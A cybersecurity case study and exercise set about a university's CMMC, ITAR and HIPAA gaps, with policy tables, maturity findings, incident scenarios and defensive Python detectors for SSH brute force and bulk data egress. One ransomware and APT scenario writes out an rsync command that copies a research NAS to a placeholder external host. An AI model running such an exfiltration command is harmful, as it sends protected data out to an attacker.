| Security Awareness Training | KnowBe4 (contracted); targeted phishing simulations | OIT-managed staff and faculty accounts assigned training; ~3,000 assignees | Not Enforced | No mandatory enforcement; completion rate not tracked; Faculty Senate resolution cited against mandating training; zero ITAR/EAR-specific training for researchers; zero CUI handling training for PIs; departmental IT staff excluded from KnowBe4 program |
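Once VLAN 60 logs reach the SIEM, the first detection the SOC analyst needs is the one the SRV-05 exposure invites: password guessing against the internet-facing head node followed by a successful single-factor logon. The following added example, written for this case study rather than taken from ARU's Splunk deployment, runs that correlation in plain Python over constructed sshd log lines (the hostname srv-05 is the document's; the usernames and the 203.0.113.0/24 and 198.51.100.0/24 source addresses are constructed documentation values). It treats 10.0.0.0/8 and 172.16.0.0/12 as internal, matching the VLAN plan above.

```python
"""Detect SSH brute force, password spraying and single-factor logons in sshd logs.

Added example for this case study; the log lines below are constructed.
"""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# syslog-style sshd authentication records (OpenSSH "Accepted" / "Failed" lines)
SSHD_AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\S+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

# ARU's internal ranges from the VLAN plan. ipaddress.is_private() also counts the
# 198.51.100/24 and 203.0.113/24 documentation ranges as private, so list explicitly.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12")]

# Constructed sample: six guesses then a password logon from one external host,
# a three-user spray from a second host, and two internal logons for contrast.
SAMPLE_AUTH_LOG = [
    "Nov 14 02:13:07 srv-05 sshd[21877]: Failed password for invalid user admin from 203.0.113.45 port 51122 ssh2",
    "Nov 14 02:13:09 srv-05 sshd[21879]: Failed password for root from 203.0.113.45 port 51124 ssh2",
    "Nov 14 02:13:12 srv-05 sshd[21881]: Failed password for rpatel from 203.0.113.45 port 51126 ssh2",
    "Nov 14 02:13:20 srv-05 sshd[21883]: Failed password for rpatel from 203.0.113.45 port 51128 ssh2",
    "Nov 14 02:13:31 srv-05 sshd[21885]: Failed password for rpatel from 203.0.113.45 port 51130 ssh2",
    "Nov 14 02:13:40 srv-05 sshd[21887]: Failed password for rpatel from 203.0.113.45 port 51132 ssh2",
    "Nov 14 02:13:50 srv-05 sshd[21887]: Connection closed by 203.0.113.45 port 51132 [preauth]",
    "Nov 14 02:14:31 srv-05 sshd[21912]: Accepted password for rpatel from 203.0.113.45 port 51188 ssh2",
    "Nov 14 03:02:01 srv-05 sshd[22001]: Failed password for invalid user test from 198.51.100.23 port 40001 ssh2",
    "Nov 14 03:02:04 srv-05 sshd[22003]: Failed password for invalid user oracle from 198.51.100.23 port 40003 ssh2",
    "Nov 14 03:02:08 srv-05 sshd[22005]: Failed password for invalid user ubuntu from 198.51.100.23 port 40005 ssh2",
    "Nov 14 08:01:02 srv-05 sshd[22210]: Accepted publickey for pgarcia from 10.20.4.17 port 50102 ssh2: ED25519 SHA256:c0nstructed",
    "Nov 14 08:05:44 srv-05 sshd[22231]: Accepted password for jsmith from 10.20.7.9 port 50190 ssh2",
]


def is_internal(ip):
    """True when the source address falls inside ARU's internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_auth_log(lines):
    """Return matched authentication events in log order; other sshd noise is skipped."""
    events = []
    for line in lines:
        m = SSHD_AUTH_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")  # syslog carries no year
            events.append(ev)
    return events


def detect_ssh_abuse(lines, fail_threshold=5, spray_users=3, window=timedelta(minutes=10)):
    """Correlate events per source IP and return a list of alert dicts.

    brute_force: at least fail_threshold failures from one IP.
    password_spray: at least spray_users distinct usernames tried from one IP.
    credential_compromise_suspected: a successful logon from an IP that had at least
        fail_threshold failures, the last of them within `window` before the success.
    single_factor_logon: any "Accepted password" (the SRV-05 gap), marked external
        when the source is outside the internal ranges.
    """
    state = defaultdict(lambda: {"failures": 0, "users": set(), "last_fail": None})
    alerts = []
    for ev in parse_auth_log(lines):
        st = state[ev["ip"]]
        if ev["result"] == "Failed":
            st["failures"] += 1
            st["users"].add(ev["user"])
            st["last_fail"] = ev["ts"]
            continue
        if ev["method"] == "password":
            alerts.append({"type": "single_factor_logon", "ip": ev["ip"], "user": ev["user"],
                           "external": not is_internal(ev["ip"])})
        if st["failures"] >= fail_threshold and ev["ts"] - st["last_fail"] <= window:
            alerts.append({"type": "credential_compromise_suspected", "ip": ev["ip"],
                           "user": ev["user"], "failures_before": st["failures"]})
    for ip, st in state.items():
        if st["failures"] >= fail_threshold:
            alerts.append({"type": "brute_force", "ip": ip, "failures": st["failures"]})
        if len(st["users"]) >= spray_users:
            alerts.append({"type": "password_spray", "ip": ip, "distinct_users": len(st["users"])})
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_abuse(SAMPLE_AUTH_LOG):
        print(alert)
```

The same logic maps directly onto a Splunk search over `sourcetype=linux_secure` once the universal forwarder is on SRV-05, but none of it can run until VLAN 60 is ingested; the "single_factor_logon" alert is also a useful completion metric for the MFA rollout, since it should drop to zero when password authentication is disabled on the head node.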
ARU's third-party risk posture is fragmented across two parallel vendor ecosystems: OIT-managed vendor relationships (with formal contracts, SOC 2 reviews, and BAAs where applicable) and departmental vendor relationships (acquired independently by 24 departmental IT staff, largely unknown to OIT, with no security vetting). The CMMC pre-assessment identified the lack of a formal Third-Party Risk Management (TPRM) program as a contributing factor in Supply Chain & Dependencies domain failures. Six key vendor relationships are assessed below.
| Policy Name | Status | Last Reviewed | Key Gap |
|---|---|---|---|
| Information Security Policy (Master) | Exists — Outdated | March 2022 | Predates CISO appointment; does not address CMMC, CUI, or departmental IT; under revision by GRC Specialist (target: May 2026) |
| Acceptable Use Policy (AUP) | Exists — Outdated | January 2021 | Does not address CUI handling, research data classification, or GCC High enclave requirements; faculty senate objects to USB restriction provisions |
| CUI Handling & Data Classification Policy | Does Not Exist | — | Critical CMMC gap; no policy defining CUI identification, marking, handling, or approved systems; draft in progress by GRC Specialist (target: June 2026) |
| System Security Plan (SSP) — CMMC Enclave | Draft — Incomplete | In progress (started Sept 2025) | Required for CMMC Level 2 assessment; 60% complete; enclave boundary section not finalized due to 73 unmigrated researchers; Granite Shield C3PAO review scheduled Q3 2026 |
| Incident Response Plan (IRP) | Exists — Outdated | November 2023 | Does not address HPC compromise scenario, ITAR breach notification, DFARS 252.204-7012 72-hour reporting, or FERPA breach; last tabletop exercise: 2022 |
| Export Control Policy (ITAR/EAR) | Does Not Exist | — | No institutional ITAR/EAR technology control plan; no deemed export screening for research staff; IAS incident (Dr. Liu) directly attributable to this gap; Office of Research Compliance owns this — not OIT |
| Remote Access Policy | Exists — Outdated | February 2022 | Does not require MFA for all remote access; does not address HPC exempt status; VPN split-tunneling allowed without restriction |
| Data Backup & Recovery Policy | Exists — Current | August 2025 | Scoped to OIT-managed systems only; HPC cluster and Research NAS explicitly excluded ("managed by VP Research office"); no RTO/RPO defined for research data |
| Third-Party Risk Management Policy | Does Not Exist | — | No vendor security assessment requirements; departmental vendor acquisitions not subject to OIT review; C3PAO (Granite Shield) was engaged before a TPRM policy existed |
| Physical Security Policy | Exists — Outdated | June 2021 | Does not address Research Park facilities (FAC-04, FAC-06); predates ITAR requirements for IAS lab; badge audit requirements not met at FAC-04 |
| HIPAA Privacy & Security Policies | Exists — Outdated | March 2022 | HIPAA risk analysis dated 2022; does not cover TMRC PHI-scope systems; BAA inventory incomplete (1 NIH data repository BAA not executed) |
| Security Awareness Training Policy | Does Not Exist as Mandatory Policy | — | KnowBe4 training assigned but not required; no policy mandating completion or defining role-based requirements; Faculty Senate resolution creates enforcement barrier; NIST 800-171 AT-2 / AT-3 non-conformity |

| Framework | Applicability | Current Compliance Status |
|---|---|---|
| NIST SP 800-171 r2 | All DOE, DOD/DARPA, and applicable NIH/NSF CUI-handling research | Non-Compliant — 47 of 110 practices unimplemented; SPRS estimated: −87; C3PAO assessment Q4 2026 |
| CMMC Level 2 | DARPA autonomous systems contract (required by contract clause); extends to all CUI-scope systems | Not Yet Certified — pre-assessment complete; POA&M in progress; target certification Q4 2026 contingent on gap closure |
| FERPA | All student education records (18,400 students; Banner SIS; Canvas; Workday academic integration) | Substantially Compliant — Ellucian Banner SOC 2 Type II; annual FERPA training assigned; SRV-08 middleware is primary vulnerability; no FERPA breach history |
| HIPAA Security Rule | NIH-funded human subjects research (TMRC); limited PHI scope | Partially Compliant — HIPAA risk analysis dated 2022 (overdue); BAA incomplete (1 NIH repository); TMRC PHI-scope systems on VLAN 20 (not segmented); no encryption verification on TMRC endpoints |
| ITAR (22 CFR 120–130) | IAS DARPA autonomous systems research (UAV/autonomous vehicle defense articles) | Active Violation — deemed export violation (Dr. Liu); DDTC self-report not yet filed; IAS data on VLAN 20 (not CUI enclave); no Technology Control Plan; export license review overdue |
| EAR (15 CFR 730–774) | Dual-use research with potential export control implications (Materials Innovation Center, computational research) | Limited Assessment — no formal EAR screening program; Office of Research Compliance handles case-by-case; systematic review not conducted; low current risk vs. ITAR |
| 2 CFR Part 200 (Uniform Guidance) | All federal grant funding (DOE, DOD/DARPA, NIH, NSF — $185M total) | Substantially Compliant — Kuali Research grants management; financial audit current; cybersecurity controls are the primary open compliance gap affecting grant renewals |
| Pennsylvania Breach Notification Law (73 P.S. §2301) | Any breach of PA resident personal information (students, employees) | Policy Aware — legal counsel has standing guidance; 60-day notification requirement; no breach history; IRP addresses but predates FERPA/HIPAA specific triggers |
ARU conducted a C2M2 v2.1 self-evaluation in Q1 2026, facilitated by CISO James Whitfield with input from the OIT team and Granite Shield LLC (C3PAO). The assessment evaluated all ten C2M2 domains against documented practices, interviews with IT staff and select faculty, and review of available policy documentation. Results reflect an institution with foundational controls for administrative IT, nearly absent controls for research IT, and governance gaps that undercut the effectiveness of deployed tools. The overall profile: MIL 1 across most domains, MIL 2 only in Risk Management (where the CMMC gap assessment and POA&M represent structured management), and MIL 0 in Workforce Management.
OIT maintains a formal asset inventory for OIT-managed systems via ServiceNow ITSM. However, the 380+ research endpoints, 8 shadow servers, and departmental IT assets are not in the inventory. No baseline configuration standards exist for research or lab systems.
Tenable.io provides authenticated vulnerability scanning for OIT-managed systems. CISA advisories are received (REN-ISAC and CISA email). However, the HPC cluster and Research NAS are not scanned, and the November 2025 CISA advisory about HPC SSH targeting took 6 weeks to reach the CISO after initial receipt.
Risk Management is ARU's strongest C2M2 domain — driven by the CMMC gap assessment, active POA&M, and C3PAO engagement. A formal risk register is maintained by the GRC Specialist. Risk ownership is assigned. Executive visibility exists through the new ISGC. This is the only domain where management-level practices (MIL 2) are substantially demonstrated.
Duo MFA is deployed for staff and VPN. Active Directory manages OIT user accounts. However, there is no formal access review cycle, departmental accounts are managed outside OIT, and CyberArk PAM is only 60% deployed. The HPC cluster has no MFA.
Splunk SIEM is deployed and monitored by a dedicated SOC Analyst during business hours. However, coverage is limited to OIT-managed systems. The HPC cluster, Research NAS, departmental endpoints, and shadow servers generate no telemetry in Splunk. A CISA advisory about HPC targeting was received but not actioned for 6 weeks.
An Incident Response Plan exists but has not been updated since November 2023 and has never been exercised for the highest-risk scenarios: HPC compromise, ITAR breach, or ransomware on VLAN 20. The plan does not address DFARS 252.204-7012 72-hour reporting or ITAR notification to DDTC.
OIT reviews SOC 2 reports for major SaaS vendors (Workday, Ellucian, CrowdStrike, Kuali). However, no formal TPRM program exists, departmental vendor relationships are unknown to OIT, and research instrument vendors have unmonitored network access. The security of CMMC sub-awardees has not been assessed.
ARU's Workforce Management is the only domain assessed at MIL 0. No mandatory security awareness training exists. The Faculty Senate resolution actively creates a political barrier to enforcement. No role-based security training is provided for researchers handling CUI, ITAR data, or HIPAA-scope information. The CISO has no authority to mandate training for departmental IT staff.
Palo Alto NGFW, Cisco VLAN segmentation, and CrowdStrike EDR constitute the architectural foundation. However, the architecture has critical intentional gaps: SSH inspection disabled on VLAN 60, no zero-trust principles, CUI enclave boundary incomplete, and no DLP. The architecture protects administrative IT well and research IT poorly.
The CISO appointment 18 months ago marked ARU's first formal cybersecurity program. Budget exists, a GRC tool is in use, and CMMC remediation is structured. However, the CISO lacks formal authority over research IT, the ISGC is new and untested, and the Security Engineer vacancy leaves the program understaffed for its remediation workload.
During a network scan in November 2025, OIT discovered 8 unregistered servers in a lab closet at FAC-03 (Armstrong Research Complex). The servers are running unknown operating systems and are connected to VLAN 20. The departmental IT manager for the college says "those have been there for years — they run some bioinformatics pipelines." As the CISO, what are your immediate actions? What risks do these servers create for ARU's CMMC posture? Who has the authority to require their remediation, and what process would you follow?
Two faculty PIs — Dr. James Park (Physics) and Dr. Elena Vasquez (Engineering) — have refused to enroll in Duo Security for HPC access despite six months of escalation. Their accounts have active SSH access to SRV-05 (password only) which hosts DOE and DOD CUI. CISO Whitfield's request for a VP Research mandate has been pending 11 weeks. What governance levers does the CISO have to force compliance? What are the consequences of inaction if a breach occurs through one of these accounts? Draft a one-paragraph escalation memo to the President that frames this as an institutional risk, not an IT request.
ARU's Splunk SIEM covers OIT-managed systems only. The HPC (VLAN 60), Research NAS (SRV-06), departmental endpoints (VLAN 20), and shadow IT servers generate no telemetry. Assume ARU's security budget cannot increase for 12 months. Design a minimum viable monitoring approach that closes the most critical blind spots within existing resources. Specifically: what three telemetry sources would provide the highest-value coverage, and how would you deploy Splunk forwarders without VP Research approval for the HPC cluster?
At 11:47 PM on a Tuesday, a network flow anomaly alert (triggered by Internet2 traffic analysis, not Splunk) shows 340 GB of outbound data from the Research NAS (SRV-06) to an IP address in Eastern Europe over a 4-hour window. The CISO is paged. The NAS contains CUI from four active federal contracts. Walk through ARU's first 60 minutes of incident response. Who is notified? What containment actions are available? What are the DFARS 252.204-7012 reporting requirements, and what is the 72-hour deadline clock from the moment of discovery?
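The flow anomaly in this scenario was caught by Internet2 analysis rather than by anything ARU operates, which is exactly the blind spot the previous question asks you to close. The following is an added example, not part of the case study and not ARU's or any vendor's code: a minimal outbound-volume detector that a SOC could run over exported flow records (NetFlow/IPFIX style tuples) for hosts that generate no Splunk telemetry. It aggregates bytes from each internal host to external destinations over a sliding 4-hour window and alerts when a threshold is crossed, and it computes the DFARS 252.204-7012 72-hour reporting deadline from the discovery timestamp. The internal address space, the SRV-06 address (10.20.6.10), the external destinations (RFC 5737 documentation ranges) and all flow records are constructed for the example.

```python
"""Added example: outbound-volume exfiltration detector over constructed flow records."""
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

GB = 10**9

# Assumed internal address space for this example, not ARU's real addressing.
INTERNAL_NETS = [ip_network("10.0.0.0/8"),
                 ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]


def is_internal(ip: str) -> bool:
    """True when the address falls inside one of the assumed internal ranges."""
    return any(ip_address(ip) in net for net in INTERNAL_NETS)


def constructed_flows():
    """Constructed flow records (timestamp, src, dst, bytes) shaped like the scenario.

    SRV-06 is assumed to be 10.20.6.10; 198.51.100.0/24 is a documentation range
    standing in for the external destination.
    """
    base = datetime(2026, 3, 3, 19, 47)
    flows = []
    # Eight half-hour flows of 42.5 GB each = 340 GB to one external address in 3.5 h.
    for i in range(8):
        flows.append((base + timedelta(minutes=30 * i),
                      "10.20.6.10", "198.51.100.7", 42_500_000_000))
    # A large internal-to-internal backup from the same host: must be ignored.
    flows.append((base + timedelta(hours=1), "10.20.6.10", "10.10.1.5", 500 * GB))
    # An earlier, isolated 60 GB transfer well outside any window containing the burst.
    flows.append((base - timedelta(hours=10), "10.20.6.10", "198.51.100.7", 60 * GB))
    # Ordinary workstation web traffic: 200 MB every half hour.
    for i in range(8):
        flows.append((base + timedelta(minutes=30 * i),
                      "10.20.5.40", "198.51.100.20", 200_000_000))
    return flows


def outbound_volume_alerts(flows, window=timedelta(hours=4), threshold_bytes=100 * GB):
    """Return {src_ip: peak_bytes} for internal hosts whose external egress within any
    `window`-long span reaches `threshold_bytes`. Uses a two-pointer sliding window per host."""
    by_src = defaultdict(list)
    for ts, src, dst, nbytes in flows:
        if is_internal(src) and not is_internal(dst):   # only internal -> external egress
            by_src[src].append((ts, nbytes))

    alerts = {}
    for src, recs in by_src.items():
        recs.sort()                     # chronological order
        total, start = 0, 0
        for ts, nbytes in recs:
            total += nbytes
            # Drop records that fell out of the trailing window.
            while ts - recs[start][0] > window:
                total -= recs[start][1]
                start += 1
            if total >= threshold_bytes:
                alerts[src] = max(alerts.get(src, 0), total)
    return alerts


def dfars_report_deadline(discovered_at: datetime) -> datetime:
    """DFARS 252.204-7012 requires reporting within 72 hours of discovery."""
    return discovered_at + timedelta(hours=72)


if __name__ == "__main__":
    for host, peak in outbound_volume_alerts(constructed_flows()).items():
        print(f"ALERT {host}: {peak / GB:.0f} GB egress within 4h window")
    paged_at = datetime(2026, 3, 3, 23, 47)   # 11:47 PM discovery, as in the scenario
    print("DFARS 72-hour deadline:", dfars_report_deadline(paged_at))
```

A threshold of 100 GB per four hours is an illustrative starting point; a research NAS that legitimately syncs large datasets to collaborators would need a per-host baseline rather than a single institutional number, otherwise the detector drowns in false positives. Note that the deadline clock starts at discovery, which here is the moment the CISO is paged, not when the exfiltration began.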
The Faculty Senate resolution (November 2025) expressing concern about cybersecurity controls impeding academic freedom has been cited by three department chairs as justification for not implementing OIT security baselines on departmental endpoints — specifically blocking CrowdStrike deployment on 536 dept-managed faculty laptops. ARU's DARPA Contracting Officer has written to the President stating that CMMC Level 2 certification is required by Q4 2026 or the contract ($18M) is at risk. How do you frame the CMMC requirement to the Faculty Senate? What is the minimum control set that satisfies CMMC without triggering academic freedom concerns? Who has final decision authority if the Faculty Senate and the President's office are in conflict?
ARU's 24 departmental IT staff independently acquire vendors for research software, lab instruments, and specialized computing tools. Several of these have persistent network connections to VLAN 20 (general faculty/research). OIT has no inventory of these relationships. For the CMMC enclave, how does this create a supply chain risk? What is the minimum TPRM control set that would satisfy CMMC Level 2 Practice SC.L2-3.13.1 (boundary protection) as it relates to third-party connections? Design a lightweight departmental vendor notification process that doesn't require full OIT procurement control.
The President has authorized a $200,000 emergency cybersecurity allocation following the ITAR incident (Dr. Liu). The CISO has 90 days to spend it and must present a prioritized plan to the Board of Trustees. The four highest-risk items are: (1) close HPC SSH internet exposure via a VPN jump host — estimated $35K in tools + 3 weeks staff time; (2) migrate remaining 73 CUI researchers to GCC High — $0 licensing (seats purchased), 2 months staff time; (3) deploy Splunk forwarders to HPC and NAS — $45K in Splunk licensing + 4 weeks; (4) fill Security Engineer vacancy — $135K salary + benefits, 60-day hiring timeline. Prioritize these four items and justify your sequencing based on C2M2 domain impact and risk reduction per dollar.
Scenario: It is 11:04 PM on a Tuesday. The ARU SOC Analyst receives an automated Splunk alert: 847 failed SSH authentication attempts against SRV-05 (HPC head node) from a Russian IP block (ASN associated with APT29 activity per CISA indicator feed) over the past 40 minutes. At 11:23 PM the alert type changes — successful SSH login from a new IP in the same block, using the credentials of Dr. James Park (Physics), one of the two PIs who never enrolled in Duo. The session is active. The attacker is running rsync -av /mnt/nas_research/ [external IP]:/drop/ — exfiltrating from the Research NAS. Estimated data transferred so far: 22 GB. The SOC Analyst wakes the CISO.
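The sequence in this scenario, a burst of failed SSH logins followed by a successful password login from the same address block, is one of the simplest high-value correlations a SOC can run, and it is precisely what SRV-05 cannot produce today because the HPC head node sends nothing to Splunk. The following is an added example, not part of the case study and not ARU's or any vendor's code: it parses sshd-style auth log lines, groups failures by /24 source block (an assumption, since the scenario describes an attacker rotating addresses inside one block), and raises an alert when an accepted login from that block is preceded by at least a configurable number of failures within the look-back window. It also lists every accepted password login, which on a CUI host that is supposed to require Duo is itself a finding. The log lines, host name, user names and addresses (RFC 5737 documentation ranges) are constructed for the example.

```python
"""Added example: SSH brute-force-then-success correlation over constructed auth logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_network

# Matches OpenSSH "Failed/Accepted <method> for [invalid user] <user> from <ip> port <n> ssh2".
LOG_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse_line(line: str, year: int = 2026):
    """Return a dict for a recognised sshd auth line, else None. Syslog lines carry no
    year, so one is supplied by the caller (assumed 2026 here)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "host": m["host"], "result": m["result"],
            "method": m["method"], "user": m["user"], "ip": m["ip"]}


def source_block(ip: str) -> str:
    """Collapse a source address to its /24 (assumption: one attacker block)."""
    return str(ip_network(f"{ip}/24", strict=False))


def constructed_auth_log():
    """Constructed sshd log lines shaped like the scenario (smaller counts)."""
    lines = []
    # 30 failures over 30 minutes from 203.0.113.0/24, mixing a real user and a bad one.
    for i in range(30):
        ts = datetime(2026, 3, 3, 22, 45) + timedelta(minutes=i)
        user = "jpark" if i % 3 else "invalid user admin"
        lines.append(f"{ts:%b %d %H:%M:%S} srv-05 sshd[{2200 + i}]: Failed password for "
                     f"{user} from 203.0.113.{40 + i} port {51000 + i} ssh2")
    # Unrelated noise from a different block.
    for i in range(3):
        ts = datetime(2026, 3, 3, 22, 50, 10 * i)
        lines.append(f"{ts:%b %d %H:%M:%S} srv-05 sshd[{2300 + i}]: Failed password for "
                     f"root from 198.51.100.9 port {40000 + i} ssh2")
    # A legitimate key-based login from inside (assumed internal address).
    lines.append("Mar  3 23:00:41 srv-05 sshd[2350]: Accepted publickey for cmorrow "
                 "from 10.20.5.40 port 49152 ssh2")
    # The event from the scenario: password login for jpark from the attacking block.
    lines.append("Mar  3 23:23:02 srv-05 sshd[2390]: Accepted password for jpark "
                 "from 203.0.113.77 port 50011 ssh2")
    return lines


def correlate(lines, min_failures=20, window=timedelta(minutes=60)):
    """Alert on each accepted login preceded by >= min_failures failures from the same
    /24 within `window`. Returns a list of alert dicts in log order."""
    events = [e for e in map(parse_line, lines) if e]
    failures = defaultdict(list)                      # block -> failure timestamps
    for e in events:
        if e["result"] == "Failed":
            failures[source_block(e["ip"])].append(e["ts"])

    alerts = []
    for e in events:
        if e["result"] != "Accepted":
            continue
        blk = source_block(e["ip"])
        prior = [t for t in failures[blk] if e["ts"] - window <= t <= e["ts"]]
        if len(prior) >= min_failures:
            alerts.append({"ts": e["ts"], "host": e["host"], "user": e["user"],
                           "method": e["method"], "source_ip": e["ip"],
                           "source_block": blk, "failed_count": len(prior)})
    return alerts


def password_accepts(lines):
    """Every accepted *password* login: on an MFA-mandated host each one is a finding."""
    return [e["user"] for e in map(parse_line, lines) if e
            and e["result"] == "Accepted" and e["method"] == "password"]


if __name__ == "__main__":
    for a in correlate(constructed_auth_log()):
        print(f"ALERT {a['host']}: {a['user']} accepted via {a['method']} from "
              f"{a['source_ip']} after {a['failed_count']} failures from {a['source_block']}")
    print("password logins:", password_accepts(constructed_auth_log()))
```

The correlation needs the log to reach the SIEM in the first place; with the HPC head node outside Splunk, this rule would have fired nowhere on the night in the scenario. The 20-failure threshold and 60-minute window are illustrative; on a real head node the failure baseline from internet-exposed SSH is high enough that the "accepted after failures from the same block" condition, not the raw failure count, is what makes the alert actionable.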
Scenario: During a quarterly audit of the CMMC CUI enclave access list, the GRC Specialist discovers that Dr. Wei Liu — a Chinese national with H-1B immigration status, employed as a Research Assistant Professor in the Institute for Autonomous Systems — has been accessing IAS lab systems containing ITAR-controlled technical data (UAV guidance algorithms and autonomous vehicle control source code) for the past 14 months. The systems are on VLAN 20 (general faculty network). Access logs show 42 authenticated sessions to the IAS NAS from Dr. Liu's account. The IAS Lab Director (Dr. Liu's direct supervisor) was aware of his access and did not flag it as a concern. ARU has no Technology Control Plan on file with the State Department.
Scenario: It is 7:34 AM on a Monday — eight days before ARU's spring semester financial aid disbursement date ($4.2 million to 6,800 students). The Help Desk receives 17 simultaneous calls from faculty reporting encrypted files and a ransom note on their screens. Investigation by the OIT Infrastructure Director confirms: a ransomware variant has spread across VLAN 20 (faculty/research) originating from a dept-managed faculty laptop (no CrowdStrike deployed). The malware has encrypted files on the IAS NAS and multiple research lab computers and is actively attempting lateral movement to VLAN 10 (admin). The VLAN 10/20 ACL appears to be holding. SRV-08 (Banner Integration Middleware — the financial aid dependency) is on VLAN 10 and is not yet affected. The 8 shadow IT servers are unresponsive. Three IAS researchers report their ITAR files appear to have been exfiltrated.
Constraints: $850,000 emergency authorization (one-time); 4-person security team (CISO + Security Analyst + GRC Specialist + SOC Analyst) plus 1 vacant Security Engineer position; institutional governance friction (Faculty Senate resolution, VP Research HPC authority); CMMC Level 2 assessment deadline Q4 2026.
Task: Using the ARU case study data, construct a prioritized remediation roadmap across three time horizons. For each item, identify the C2M2 domain it addresses, the estimated cost or effort, and the primary owner (CISO / CIO / VP Research / Legal). Justify your sequencing — what must happen first to enable later remediation steps?
Suggested Priority Framework: